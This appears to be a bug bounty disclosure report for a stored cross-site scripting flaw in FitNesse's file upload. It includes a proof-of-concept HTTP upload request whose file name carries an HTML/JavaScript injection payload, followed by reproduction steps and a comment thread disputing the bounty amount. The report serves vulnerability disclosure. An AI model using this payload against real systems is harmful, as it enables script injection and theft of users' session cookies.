Cross-site Scripting (XSS) - Stored in unclebob/fitnesse
Reported on
Sep 22nd 2021
Description
Stored XSS in FileName allows for arbitrary execution of JavaScript
Proof of Concept
// PoC Request
POST /files/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------82050748222730013181475300839
Content-Length: 71559
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/files/
Cookie: textwrapon=false; textautoformat=false; wysiwyg=textarea
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="responder"
upload
-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg
ÿØÿà JFIF ` ` ÿí
-----------------------------82050748222730013181475300839--
Step to reproduce
At Menu choose Tools > Files
Upload File with Filename contain payload: Sun'><img src=x onerror=alert(1)>set.jpg
Video PoC: PoC
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
SECURITY.md
2 years ago
@zidingz Ah. So you will update this report on behalf of the maintainers
Hi, Is there any mistake in the bounty placed?? when i wrote the report it was 25$
@admin Is it possible to review the bounty for this xss vulnerability??
@lethanhphuc - it looks like the maintainer selected this bounty when rewarding the report.
@admin I think there should be suggestions about bounties for maintainers when they reward researchers. :(( 5$ is too little
If you would like to make a feature request, feel free to add it to our public roadmap.